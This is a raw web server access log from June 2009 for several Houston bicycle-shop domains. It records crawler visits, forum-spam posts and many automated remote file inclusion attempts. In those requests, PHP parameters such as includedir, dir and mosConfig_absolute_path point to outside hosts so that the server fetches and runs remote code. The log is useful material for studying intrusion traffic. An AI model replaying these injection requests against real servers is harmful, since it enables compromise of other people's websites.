213.149.105.23 - - [11/Jun/2009:00:10:59 -0700] "GET /translations/Hungarian.txt//tools/send_reminders.php?noSet=0&includedir=http://aldeanos.com/WEB-INF/lib/.../id2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "houstonbikeshop.com"
213.149.105.23 - - [11/Jun/2009:00:10:59 -0700] "GET /translations/Italian.txt//tools/send_reminders.php?noSet=0&includedir=http://aldeanos.com/WEB-INF/lib/.../id2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "houstonbikeshop.com"
124.115.1.7 - - [11/Jun/2009:00:15:06 -0700] "GET / HTTP/1.1" 200 1764 "http://www.svbikes.com/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)" "www.svbikes.com"
58.61.164.139 - - [11/Jun/2009:00:17:38 -0700] "GET / HTTP/1.0" 200 1748 "http://www.svbikes.com/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)" "www.svbikes.com"
65.55.106.238 - - [11/Jun/2009:00:18:59 -0700] "GET /robots.txt HTTP/1.1" 404 275 "-" "msnbot/2.0b (+http://search.msn.com/msnbot.htm)" "www.svbikes.com"
91.121.150.170 - - [11/Jun/2009:00:19:34 -0700] "POST /bullitinboard/posting.php?mode=newtopic&f=1 HTTP/1.1" 200 534 "-" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)" "www.svbikes.com"
58.61.164.39 - - [11/Jun/2009:00:22:09 -0700] "GET / HTTP/1.1" 200 1764 "http://www.svbikes.com/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)" "www.svbikes.com"
216.97.239.130 - - [11/Jun/2009:00:24:30 -0700] "GET /translations/Spanish.txt//tools/send_reminders.php?noSet=0&includedir=http://aldeanos.com/WEB-INF/lib/.../id3.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.819" "bicyclestoreshouston.com"
216.97.239.130 - - [11/Jun/2009:00:24:31 -0700] "GET /tools/send_reminders.php?noSet=0&includedir=http://aldeanos.com/WEB-INF/lib/.../id3.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.819" "bicyclestoreshouston.com"
216.97.239.130 - - [11/Jun/2009:00:24:31 -0700] "GET /translations//tools/send_reminders.php?noSet=0&includedir=http://aldeanos.com/WEB-INF/lib/.../id3.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.819" "bicyclestoreshouston.com"
216.97.239.130 - - [11/Jun/2009:00:24:58 -0700] "GET /tools/send_reminders.php?noSet=0&includedir=http://aldeanos.com/WEB-INF/lib/.../id3.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.819" "houstonbikeshop.com"
204.62.53.203 - - [11/Jun/2009:00:25:22 -0700] "GET /robots.txt HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Charlotte/1.1; http://www.searchme.com/support/)" "www.svbikes.com"
204.62.53.203 - - [11/Jun/2009:00:25:41 -0700] "GET /logs/access_081110.log HTTP/1.1" 200 65536 "-" "Mozilla/5.0 (compatible; Charlotte/1.1; http://www.searchme.com/support/)" "www.svbikes.com"
58.61.164.140 - - [11/Jun/2009:00:26:20 -0700] "GET / HTTP/1.1" 200 1764 "http://www.svbikes.com/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)" "www.svbikes.com"
216.97.239.130 - - [11/Jun/2009:00:26:56 -0700] "GET /translations/Finnish.txt//tools/send_reminders.php?noSet=0&includedir=http://aldeanos.com/WEB-INF/lib/.../id3.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.819" "bicyclestoreshouston.com"
124.115.1.8 - - [11/Jun/2009:00:27:00 -0700] "GET / HTTP/1.1" 200 1764 "http://www.svbikes.com/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)" "www.svbikes.com"
72.30.78.238 - - [11/Jun/2009:00:29:48 -0700] "GET /bullitinboard/viewtopic.php?p=1968 HTTP/1.0" 200 517 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.houstonbikeshop.com"
216.97.239.130 - - [11/Jun/2009:00:30:39 -0700] "GET /translations/Hungarian.txt//tools/send_reminders.php?noSet=0&includedir=http://aldeanos.com/WEB-INF/lib/.../id3.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.819" "houstonbikeshop.com"
216.97.239.130 - - [11/Jun/2009:00:30:39 -0700] "GET /tools/send_reminders.php?noSet=0&includedir=http://aldeanos.com/WEB-INF/lib/.../id3.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.819" "houstonbikeshop.com"
216.97.239.130 - - [11/Jun/2009:00:30:39 -0700] "GET /translations//tools/send_reminders.php?noSet=0&includedir=http://aldeanos.com/WEB-INF/lib/.../id3.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.819" "houstonbikeshop.com"
216.97.239.130 - - [11/Jun/2009:00:30:39 -0700] "GET /translations/Italian.txt//tools/send_reminders.php?noSet=0&includedir=http://aldeanos.com/WEB-INF/lib/.../id3.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.819" "houstonbikeshop.com"
216.97.239.130 - - [11/Jun/2009:00:31:09 -0700] "GET /tools/send_reminders.php?noSet=0&includedir=http://aldeanos.com/WEB-INF/lib/.../id3.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.819" "bicyclestoreshouston.com"
91.121.150.170 - - [11/Jun/2009:00:32:41 -0700] "POST /bullitinboard/posting.php?mode=newtopic&f=1 HTTP/1.1" 200 534 "-" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)" "bicyclestoreshouston.com"
91.121.150.170 - - [11/Jun/2009:00:39:31 -0700] "POST /bullitinboard/posting.php?mode=newtopic&f=1 HTTP/1.1" 200 534 "-" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)" "houstonbikeshop.com"
199.120.90.222 - - [11/Jun/2009:00:41:42 -0700] "GET /tools/send_reminders.php?noSet=0&includedir=http://withipod.net/css/responz/rxid1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "bicyclestoreshouston.com"
199.120.90.222 - - [11/Jun/2009:00:41:42 -0700] "GET /translations//tools/send_reminders.php?noSet=0&includedir=http://withipod.net/css/responz/rxid1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "bicyclestoreshouston.com"
199.120.90.222 - - [11/Jun/2009:00:41:42 -0700] "GET /translations/Spanish.txt%20%20//tools/send_reminders.php?noSet=0&includedir=http://withipod.net/css/responz/rxid1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "bicyclestoreshouston.com"
199.120.90.222 - - [11/Jun/2009:00:41:58 -0700] "GET /translations/Finnish.txt%20%20//tools/send_reminders.php?noSet=0&includedir=http://withipod.net/css/responz/rxid1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "bicyclestoreshouston.com"
199.120.90.222 - - [11/Jun/2009:00:42:53 -0700] "GET /tools/send_reminders.php?noSet=0&includedir=http://withipod.net/css/responz/rxid1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
199.120.90.222 - - [11/Jun/2009:00:42:53 -0700] "GET /translations//tools/send_reminders.php?noSet=0&includedir=http://withipod.net/css/responz/rxid1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
199.120.90.222 - - [11/Jun/2009:00:42:53 -0700] "GET /translations/Italian.txt%20%20//tools/send_reminders.php?noSet=0&includedir=http://withipod.net/css/responz/rxid1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
199.120.90.222 - - [11/Jun/2009:00:42:53 -0700] "GET /translations/Hungarian.txt%20%20//tools/send_reminders.php?noSet=0&includedir=http://withipod.net/css/responz/rxid1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
199.120.90.222 - - [11/Jun/2009:00:47:53 -0700] "GET /translations/Spanish.txt//tools/send_reminders.php?noSet=0&includedir=http://withipod.net/css/responz/rxid1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "bicyclestoreshouston.com"
199.120.90.222 - - [11/Jun/2009:00:48:09 -0700] "GET /translations/Finnish.txt//tools/send_reminders.php?noSet=0&includedir=http://withipod.net/css/responz/rxid1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "bicyclestoreshouston.com"
199.120.90.222 - - [11/Jun/2009:00:53:17 -0700] "GET /tools/send_reminders.php?noSet=0&includedir=http://withipod.net/css/responz/rxid1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.svbikes.com"
199.120.90.222 - - [11/Jun/2009:00:53:17 -0700] "GET /translations//tools/send_reminders.php?noSet=0&includedir=http://withipod.net/css/responz/rxid1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.svbikes.com"
199.120.90.222 - - [11/Jun/2009:00:53:17 -0700] "GET /translations/Portuguese_BR.txt//tools/send_reminders.php?noSet=0&includedir=http://withipod.net/css/responz/rxid1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.svbikes.com"
72.30.142.250 - - [11/Jun/2009:00:54:46 -0700] "GET /tmp/?M=A HTTP/1.0" 200 643 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.svbikes.com"
216.97.239.130 - - [11/Jun/2009:00:56:28 -0700] "GET /translations/German.txt//tools/send_reminders.php?noSet=0&includedir=http://aldeanos.com/WEB-INF/lib/.../id3.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.819" "houstonbikeshop.com"
65.55.106.238 - - [11/Jun/2009:00:59:46 -0700] "GET /translations/Galician.txt HTTP/1.1" 200 33430 "-" "msnbot/2.0b (+http://search.msn.com/msnbot.htm)" "www.svbikes.com"
216.97.239.130 - - [11/Jun/2009:01:06:43 -0700] "GET /translations/Dutch.txt//tools/send_reminders.php?noSet=0&includedir=http://aldeanos.com/WEB-INF/lib/.../id3.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.819" "houstonbikeshop.com"
216.97.239.130 - - [11/Jun/2009:01:11:44 -0700] "GET /translations/French.txt//tools/send_reminders.php?noSet=0&includedir=http://aldeanos.com/WEB-INF/lib/.../id3.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.819" "bicyclestoreshouston.com"
81.19.66.38 - - [11/Jun/2009:01:16:54 -0700] "GET /bullitinboard/viewtopic.php?p=2005 HTTP/1.1" 200 533 "-" "StackRambler/2.0 (MSIE incompatible)" "houstonbikeshop.com"
81.19.66.38 - - [11/Jun/2009:01:16:54 -0700] "GET /bullitinboard/viewtopic.php?p=1663 HTTP/1.1" 200 533 "-" "StackRambler/2.0 (MSIE incompatible)" "houstonbikeshop.com"
193.25.197.89 - - [11/Jun/2009:01:51:04 -0700] "GET /skin/zero_vote/error.php?dir=http://www.kq-china.com/web//plugins/system/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
193.25.197.89 - - [11/Jun/2009:01:51:04 -0700] "GET /logs//skin/zero_vote/error.php?dir=http://www.kq-china.com/web//plugins/system/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
193.25.197.89 - - [11/Jun/2009:01:51:05 -0700] "GET /logs/access.log//skin/zero_vote/error.php?dir=http://www.kq-china.com/web//plugins/system/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
204.62.53.203 - - [11/Jun/2009:02:07:56 -0700] "GET /robots.txt HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Charlotte/1.1; http://www.searchme.com/support/)" "www.svbikes.com"
204.62.53.203 - - [11/Jun/2009:02:08:15 -0700] "GET /logs/access_080810.log HTTP/1.1" 200 65536 "-" "Mozilla/5.0 (compatible; Charlotte/1.1; http://www.searchme.com/support/)" "www.svbikes.com"
72.30.142.240 - - [11/Jun/2009:02:13:52 -0700] "GET /bullitinboard/viewtopic.php?p=15586 HTTP/1.0" 200 517 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "houstonbikeshop.com"
208.80.195.39 - - [11/Jun/2009:02:17:53 -0700] "GET / HTTP/1.0" 200 1748 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; YPC 3.2.0; FunWebProducts; .NET CLR 1.1.4322; .NET CLR 2.0.50727; IEMB3; IEMB3)" "bicyclestoreshouston.com"
66.96.240.245 - - [11/Jun/2009:02:26:59 -0700] "GET /skin/zero_vote/error.php?dir=http://www.ceshima.com.mx//administrator/id2.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
66.96.240.245 - - [11/Jun/2009:02:26:59 -0700] "GET /logs//skin/zero_vote/error.php?dir=http://www.ceshima.com.mx//administrator/id2.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
66.96.240.245 - - [11/Jun/2009:02:26:59 -0700] "GET /logs/access.log//skin/zero_vote/error.php?dir=http://www.ceshima.com.mx//administrator/id2.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
69.65.123.44 - - [11/Jun/2009:02:28:30 -0700] "GET /logs/access.log//skin/zero_vote/error.php?dir=http://www.ceshima.com.mx//administrator/id2.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
69.65.123.44 - - [11/Jun/2009:02:28:30 -0700] "GET /skin/zero_vote/error.php?dir=http://www.ceshima.com.mx//administrator/id2.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
69.65.123.44 - - [11/Jun/2009:02:28:30 -0700] "GET /logs//skin/zero_vote/error.php?dir=http://www.ceshima.com.mx//administrator/id2.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
125.206.170.126 - - [11/Jun/2009:02:29:49 -0700] "GET /logs//skin/zero_vote/error.php?dir=http://www.ceshima.com.mx//administrator/id2.txt? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
125.206.170.126 - - [11/Jun/2009:02:29:50 -0700] "GET /logs/access.log//skin/zero_vote/error.php?dir=http://www.ceshima.com.mx//administrator/id2.txt? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
125.206.170.126 - - [11/Jun/2009:02:29:50 -0700] "GET /skin/zero_vote/error.php?dir=http://www.ceshima.com.mx//administrator/id2.txt? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
125.206.170.126 - - [11/Jun/2009:02:29:52 -0700] "GET /skin/zero_vote/error.php?dir=http://www.ceshima.com.mx//administrator/id2.txt? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
125.206.170.126 - - [11/Jun/2009:02:29:53 -0700] "GET /logs//skin/zero_vote/error.php?dir=http://www.ceshima.com.mx//administrator/id2.txt? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
125.206.170.126 - - [11/Jun/2009:02:29:53 -0700] "GET /logs/access.log//skin/zero_vote/error.php?dir=http://www.ceshima.com.mx//administrator/id2.txt? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
66.96.240.245 - - [11/Jun/2009:02:33:14 -0700] "GET /skin/zero_vote/error.php?dir=http://www.ceshima.com.mx//administrator/id2.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
66.96.240.245 - - [11/Jun/2009:02:33:14 -0700] "GET /logs/access.log%20%20//skin/zero_vote/error.php?dir=http://www.ceshima.com.mx//administrator/id2.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
66.96.240.245 - - [11/Jun/2009:02:33:14 -0700] "GET /logs//skin/zero_vote/error.php?dir=http://www.ceshima.com.mx//administrator/id2.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
81.19.66.38 - - [11/Jun/2009:02:35:57 -0700] "GET /bullitinboard/viewtopic.php?p=1625 HTTP/1.1" 200 533 "-" "StackRambler/2.0 (MSIE incompatible)" "houstonbikeshop.com"
81.19.66.38 - - [11/Jun/2009:02:35:58 -0700] "GET /bullitinboard/viewtopic.php?p=1663 HTTP/1.1" 200 533 "-" "StackRambler/2.0 (MSIE incompatible)" "houstonbikeshop.com"
81.19.66.38 - - [11/Jun/2009:02:35:59 -0700] "GET /bullitinboard/viewtopic.php?p=1968 HTTP/1.1" 200 533 "-" "StackRambler/2.0 (MSIE incompatible)" "houstonbikeshop.com"
81.19.66.38 - - [11/Jun/2009:02:36:00 -0700] "GET /bullitinboard/viewtopic.php?p=1972 HTTP/1.1" 200 533 "-" "StackRambler/2.0 (MSIE incompatible)" "houstonbikeshop.com"
81.19.66.38 - - [11/Jun/2009:02:36:00 -0700] "GET /bullitinboard/viewtopic.php?p=1624 HTTP/1.1" 200 533 "-" "StackRambler/2.0 (MSIE incompatible)" "houstonbikeshop.com"
125.206.170.126 - - [11/Jun/2009:02:38:58 -0700] "GET /skin/zero_vote/error.php?dir=http://www.ceshima.com.mx//administrator/id2.txt? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
125.206.170.126 - - [11/Jun/2009:02:38:58 -0700] "GET /logs//skin/zero_vote/error.php?dir=http://www.ceshima.com.mx//administrator/id2.txt? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
125.206.170.126 - - [11/Jun/2009:02:38:58 -0700] "GET /logs/access.log%20%20//skin/zero_vote/error.php?dir=http://www.ceshima.com.mx//administrator/id2.txt? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
125.206.170.126 - - [11/Jun/2009:02:39:25 -0700] "GET /logs//skin/zero_vote/error.php?dir=http://www.ceshima.com.mx//administrator/id2.txt? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
125.206.170.126 - - [11/Jun/2009:02:39:25 -0700] "GET /logs/access.log%20%20//skin/zero_vote/error.php?dir=http://www.ceshima.com.mx//administrator/id2.txt? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
125.206.170.126 - - [11/Jun/2009:02:39:26 -0700] "GET /skin/zero_vote/error.php?dir=http://www.ceshima.com.mx//administrator/id2.txt? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
222.122.140.11 - - [11/Jun/2009:02:39:32 -0700] "GET /logs/skin/zero_vote/ask_password.php?dir=http://www.angelcitytrading.com/css/1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
222.122.140.11 - - [11/Jun/2009:02:39:32 -0700] "GET /skin/zero_vote/ask_password.php?dir=http://www.angelcitytrading.com/css/1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
222.122.140.11 - - [11/Jun/2009:02:39:32 -0700] "GET /logs/access.log%20%20/skin/zero_vote/ask_password.php?dir=http://www.angelcitytrading.com/css/1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
58.61.164.40 - - [11/Jun/2009:02:42:48 -0700] "GET / HTTP/1.1" 200 1764 "http://houstonbikeshop.com/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)" "houstonbikeshop.com"
121.165.73.157 - - [11/Jun/2009:02:45:55 -0700] "GET /administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://closeup2.com/components/sex.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "houstonbikeshop.com"
121.165.73.157 - - [11/Jun/2009:02:45:57 -0700] "GET /logs/access.log/administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://closeup2.com/components/sex.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "houstonbikeshop.com"
222.122.140.11 - - [11/Jun/2009:02:53:23 -0700] "GET /logs/skin/zero_vote/ask_password.php?dir=http://www.angelcitytrading.com/css/1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
222.122.140.11 - - [11/Jun/2009:02:53:23 -0700] "GET /skin/zero_vote/ask_password.php?dir=http://www.angelcitytrading.com/css/1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
222.122.140.11 - - [11/Jun/2009:02:53:23 -0700] "GET /logs/access.log/skin/zero_vote/ask_password.php?dir=http://www.angelcitytrading.com/css/1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
66.70.14.90 - - [11/Jun/2009:02:55:23 -0700] "GET /tools/send_reminders.php?noSet=0&includedir=http://www.zymes.gr/mimisan/ID.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "bicyclestoreshouston.com"
66.70.14.90 - - [11/Jun/2009:02:55:23 -0700] "GET /translations/Spanish.txt//tools/send_reminders.php?noSet=0&includedir=http://www.zymes.gr/mimisan/ID.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "bicyclestoreshouston.com"
66.70.14.90 - - [11/Jun/2009:02:55:25 -0700] "GET /translations//tools/send_reminders.php?noSet=0&includedir=http://www.zymes.gr/mimisan/ID.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "bicyclestoreshouston.com"
66.70.14.90 - - [11/Jun/2009:02:55:32 -0700] "GET /translations/Finnish.txt//tools/send_reminders.php?noSet=0&includedir=http://www.zymes.gr/mimisan/ID.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "bicyclestoreshouston.com"
66.70.14.90 - - [11/Jun/2009:02:56:00 -0700] "GET /tools/send_reminders.php?noSet=0&includedir=http://www.zymes.gr/mimisan/ID.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "houstonbikeshop.com"
66.70.14.90 - - [11/Jun/2009:02:56:00 -0700] "GET /translations//tools/send_reminders.php?noSet=0&includedir=http://www.zymes.gr/mimisan/ID.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "houstonbikeshop.com"
66.70.14.90 - - [11/Jun/2009:02:56:01 -0700] "GET /translations/Spanish.txt/http://www.pricesucker.eu//includes/idx? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "bicyclestoreshouston.com"
66.70.14.90 - - [11/Jun/2009:02:56:01 -0700] "GET /http://www.pricesucker.eu//includes/idx? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "bicyclestoreshouston.com"
66.70.14.90 - - [11/Jun/2009:02:56:01 -0700] "GET /translations/http://www.pricesucker.eu//includes/idx? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "bicyclestoreshouston.com"
66.70.14.90 - - [11/Jun/2009:02:56:01 -0700] "GET /translations/Italian.txt//tools/send_reminders.php?noSet=0&includedir=http://www.zymes.gr/mimisan/ID.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "houstonbikeshop.com"
66.70.14.90 - - [11/Jun/2009:02:56:01 -0700] "GET /translations/Hungarian.txt//tools/send_reminders.php?noSet=0&includedir=http://www.zymes.gr/mimisan/ID.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "houstonbikeshop.com"
66.70.14.90 - - [11/Jun/2009:02:56:22 -0700] "GET /translations/Finnish.txt/http://www.pricesucker.eu//includes/idx? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "bicyclestoreshouston.com"
66.70.14.90 - - [11/Jun/2009:02:58:10 -0700] "GET /http://www.pricesucker.eu//includes/idx? HTTP/1.0" 404 275 "-" "libwww-perl/5.79" "houstonbikeshop.com"
66.70.14.90 - - [11/Jun/2009:02:58:21 -0700] "GET /translations/Hungarian.txt/http://www.pricesucker.eu//includes/idx? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "houstonbikeshop.com"
66.70.14.90 - - [11/Jun/2009:02:58:21 -0700] "GET /http://www.pricesucker.eu//includes/idx? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "houstonbikeshop.com"
66.70.14.90 - - [11/Jun/2009:02:58:21 -0700] "GET /translations/http://www.pricesucker.eu//includes/idx? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "houstonbikeshop.com"
66.70.14.90 - - [11/Jun/2009:02:58:21 -0700] "GET /translations/Italian.txt/http://www.pricesucker.eu//includes/idx? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "houstonbikeshop.com"
91.121.150.170 - - [11/Jun/2009:02:59:12 -0700] "POST /bullitinboard/posting.php?mode=newtopic&f=1 HTTP/1.1" 200 534 "-" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)" "www.svbikes.com"
66.70.14.90 - - [11/Jun/2009:03:01:31 -0700] "GET /translations/http://www.pricesucker.eu//includes/idx? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "houstonbikeshop.com"
66.70.14.90 - - [11/Jun/2009:03:01:37 -0700] "GET /http://www.pricesucker.eu//includes/idx? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "houstonbikeshop.com"
91.121.150.170 - - [11/Jun/2009:03:02:04 -0700] "POST /bullitinboard/posting.php?mode=newtopic&f=1 HTTP/1.1" 200 534 "-" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)" "www.svbikes.com"
64.6.231.215 - - [11/Jun/2009:03:14:03 -0700] "GET /skin/zero_vote/ask_password.php?dir=http://guzelsanatlar.trakya.edu.tr/modules/id1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "houstonbikeshop.com"
64.6.231.215 - - [11/Jun/2009:03:14:04 -0700] "GET /logs//skin/zero_vote/ask_password.php?dir=http://guzelsanatlar.trakya.edu.tr/modules/id1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "houstonbikeshop.com"
64.6.231.215 - - [11/Jun/2009:03:14:04 -0700] "GET /logs/access.log//skin/zero_vote/ask_password.php?dir=http://guzelsanatlar.trakya.edu.tr/modules/id1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "houstonbikeshop.com"
91.121.150.170 - - [11/Jun/2009:03:15:09 -0700] "POST /bullitinboard/posting.php?mode=newtopic&f=1 HTTP/1.1" 200 534 "-" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)" "bicyclestoreshouston.com"
64.6.231.215 - - [11/Jun/2009:03:15:09 -0700] "GET /logs/access.log//skin/zero_vote/ask_password.php?dir=http://guzelsanatlar.trakya.edu.tr/modules/id1.txt??? HTTP/1.0" 404 275 "-" "libwww-perl/5.65" "houstonbikeshop.com"
64.6.231.215 - - [11/Jun/2009:03:15:09 -0700] "GET /skin/zero_vote/ask_password.php?dir=http://guzelsanatlar.trakya.edu.tr/modules/id1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "houstonbikeshop.com"
64.6.231.215 - - [11/Jun/2009:03:15:09 -0700] "GET /logs//skin/zero_vote/ask_password.php?dir=http://guzelsanatlar.trakya.edu.tr/modules/id1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "houstonbikeshop.com"
91.121.150.170 - - [11/Jun/2009:03:15:40 -0700] "POST /bullitinboard/posting.php?mode=newtopic&f=1 HTTP/1.1" 200 534 "-" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)" "bicyclestoreshouston.com"
91.121.150.170 - - [11/Jun/2009:03:17:53 -0700] "POST /bullitinboard/posting.php?mode=newtopic&f=1 HTTP/1.1" 200 534 "-" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)" "www.svbikes.com"
91.121.150.170 - - [11/Jun/2009:03:21:22 -0700] "POST /bullitinboard/posting.php?mode=newtopic&f=1 HTTP/1.1" 200 534 "-" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)" "houstonbikeshop.com"
91.121.150.170 - - [11/Jun/2009:03:21:53 -0700] "POST /bullitinboard/posting.php?mode=newtopic&f=1 HTTP/1.1" 200 534 "-" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)" "houstonbikeshop.com"
124.115.1.7 - - [11/Jun/2009:03:27:44 -0700] "GET / HTTP/1.1" 200 1764 "http://houstonbikeshop.com/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)" "houstonbikeshop.com"
72.36.134.234 - - [11/Jun/2009:03:27:55 -0700] "GET /?view=page&pagename=http://www.recanatini.it/ra/office1.jpg??? HTTP/1.1" 200 1764 "-" "Mozilla/5.0" "houstonbikeshop.com"
72.36.134.234 - - [11/Jun/2009:03:27:56 -0700] "GET /logs/access.log%20%20//?view=page&pagename=http://www.recanatini.it/ra/office1.jpg??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
72.36.134.234 - - [11/Jun/2009:03:27:56 -0700] "GET /logs//?view=page&pagename=http://www.recanatini.it/ra/office1.jpg??? HTTP/1.1" 200 2373 "-" "Mozilla/5.0" "houstonbikeshop.com"
91.121.150.170 - - [11/Jun/2009:03:29:45 -0700] "POST /bullitinboard/posting.php?mode=newtopic&f=1 HTTP/1.1" 200 534 "-" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)" "bicyclestoreshouston.com"
91.121.150.170 - - [11/Jun/2009:03:30:58 -0700] "POST /bullitinboard/posting.php?mode=newtopic&f=1 HTTP/1.1" 200 534 "-" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)" "www.svbikes.com"
